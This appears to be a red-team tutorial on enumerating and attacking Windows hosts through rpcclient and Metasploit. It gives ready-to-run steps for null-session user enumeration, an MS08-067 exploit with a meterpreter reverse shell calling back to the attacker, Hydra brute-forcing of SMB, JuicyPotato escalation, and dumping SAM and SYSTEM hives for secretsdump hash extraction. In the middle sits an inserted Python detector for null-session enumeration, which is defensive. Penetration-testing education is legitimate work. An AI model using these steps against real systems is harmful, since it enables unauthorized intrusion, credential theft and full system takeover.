
RPC Client Enumeration - Port 135

Pivoting for Red Teamers

Using rpcclient via Metasploit for Enumeration & Exploitation

rpcclient (part of the Samba suite) is a tool for enumerating and interacting with Windows MS-RPC services. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines. Note that rpcclient reaches the SAMR and LSA interfaces over SMB named pipes (TCP 445) rather than directly through the port 135 endpoint mapper, which matters when deciding what to filter or monitor.

Using rpcclient Manually (Without Metasploit)

If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:

rpcclient -U "" <TARGET_IP>

or

rpcclient -U "guest" <TARGET_IP>

🔹 If it prompts for a password, just press Enter to attempt a null session login (or pass -N to skip the prompt entirely).

Common Enumeration Commands


enumdomusers   # Enumerate domain users
queryuser <RID>  # Get user details (Replace <RID> with a user RID)
enumdomgroups  # Enumerate groups
querygroup <RID>  # Get group details
getsid  # Get security identifier (SID)
lookupnames <USERNAME>  # Get RID of a user

Using Metasploit’s rpcclient Modules

Step 1: Start Metasploit

msfconsole

Step 2: Use the SMB Login Module


use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PASS>
run

✔ If it succeeds, you can use rpcclient with the valid credentials.

Step 3: Use auxiliary/scanner/smb/smb_enumusers


use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBDomain WORKGROUP
run

✔ This retrieves a list of valid Windows usernames via SMB.

Exploiting RPC Vulnerabilities

If RPC services are misconfigured or exploitable, you can try:

🔹 MS08-067 (Server service vulnerability, years before MS17-010/EternalBlue)


use exploit/windows/smb/ms08_067_netapi
set RHOST <TARGET_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
run

✔ This exploits an old Server service vulnerability reached over SMB; it only applies to unpatched legacy systems (Windows XP/Server 2003 era).

🔹 Other SMB/RPC Exploits

search rpc
search smb

Pro Tips for Effective Enumeration

  • Try null sessions (-U "") – some systems allow unauthenticated access.
  • Use smbclient to check for SMB shares:
    smbclient -L //<TARGET_IP> -N
  • Brute-force with Hydra if needed:
    hydra -L users.txt -P passwords.txt smb://<TARGET_IP>
  • Combine rpcclient + smbclient to extract more data before exploitation.
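The null-session enumeration described above leaves a recognisable footprint on the target: an anonymous network logon (Security event 4624, logon type 3, ANONYMOUS LOGON) followed by named-pipe opens on IPC$ (event 5145) for the samr and lsarpc pipes that enumdomusers, queryuser and lookupnames use. The following is an added detection example, not code from the original post; the log lines are constructed, and the key=value layout is an assumption about how your collector flattens the event fields.

```python
import re
from collections import defaultdict

# Constructed sample events (not from the page), one per line, modelled on the
# fields of Windows Security events 4624 (logon) and 5145 (detailed file share).
# 5145 is only written when the "Detailed File Share" audit subcategory is enabled.
SAMPLE_EVENTS = r"""
EventID=4624 LogonType=3 TargetUserName=ANONYMOUS LOGON TargetDomainName=NT AUTHORITY IpAddress=10.0.0.7
EventID=5145 SubjectUserName=ANONYMOUS LOGON ShareName=\\*\IPC$ RelativeTargetName=srvsvc IpAddress=10.0.0.7
EventID=5145 SubjectUserName=ANONYMOUS LOGON ShareName=\\*\IPC$ RelativeTargetName=samr IpAddress=10.0.0.7
EventID=5145 SubjectUserName=ANONYMOUS LOGON ShareName=\\*\IPC$ RelativeTargetName=lsarpc IpAddress=10.0.0.7
EventID=4624 LogonType=3 TargetUserName=alice TargetDomainName=CORP IpAddress=10.0.0.9
EventID=5145 SubjectUserName=alice ShareName=\\*\IPC$ RelativeTargetName=samr IpAddress=10.0.0.9
"""

# key=value pairs whose values may contain spaces ("ANONYMOUS LOGON", "NT AUTHORITY"):
# a value runs until the next " key=" token or end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# Pipes behind the rpcclient commands in this post: samr (enumdomusers, queryuser,
# enumdomgroups) and lsarpc (getsid, lookupnames, enumprivs).
ENUM_PIPES = {"samr", "lsarpc"}


def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def detect_null_session_enum(lines):
    """Return {source_ip: sorted pipe names} for every source that logged on
    anonymously over the network and then opened SAMR/LSA pipes on IPC$.
    An authenticated user touching samr (alice above) is not reported."""
    anon_sources = set()
    pipes_by_ip = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if (ev.get("EventID") == "4624" and ev.get("LogonType") == "3"
                and ev.get("TargetUserName") == "ANONYMOUS LOGON"):
            anon_sources.add(ev["IpAddress"])
        elif (ev.get("EventID") == "5145" and ev.get("ShareName", "").endswith("IPC$")
                and ev.get("RelativeTargetName") in ENUM_PIPES):
            pipes_by_ip[ev["IpAddress"]].add(ev["RelativeTargetName"])
    return {ip: sorted(p) for ip, p in pipes_by_ip.items() if ip in anon_sources}


if __name__ == "__main__":
    print(detect_null_session_enum(SAMPLE_EVENTS.strip().splitlines()))
```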

RPC Client Exploitation and Privilege Escalation

Understanding `enumprivs` in RPCClient

When you run the following command in rpcclient, it lists the privileges of the user:

rpcclient -U "USERNAME" "TARGET_IP"
enumprivs

If it returns 35 privileges, it indicates that the user has extensive permissions, some of which can be exploited for privilege escalation. Keep in mind that enumprivs is backed by the LSA's LsarEnumeratePrivileges call, which returns the privilege names the target defines, so confirm which of them the account actually holds with whoami /priv on the host before drawing conclusions.

High-Risk Privileges (Privilege Escalation)

Privilege Name                  Description and Attack Scenario
SeImpersonatePrivilege          Allows token impersonation; can be exploited using JuicyPotato/RoguePotato.
SeAssignPrimaryTokenPrivilege   Allows assigning tokens to processes; useful for privilege escalation.
SeBackupPrivilege               Allows reading all files, including sensitive registry hives (SAM and SYSTEM).

Exploiting Dangerous Privileges

If you find SeImpersonatePrivilege, you can try JuicyPotato for SYSTEM access:

msfconsole
use exploit/windows/local/juicypotato
set SESSION "SESSION_ID"
run

Extracting SAM Hashes (If `SeBackupPrivilege` is Present)

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Then use `secretsdump.py`:

python3 secretsdump.py -sam sam.save -system system.save LOCAL

🔗 Conclusion

By analyzing the privileges returned by rpcclient, attackers can exploit misconfigurations and escalate privileges to SYSTEM using tools like JuicyPotato or by extracting registry hives.
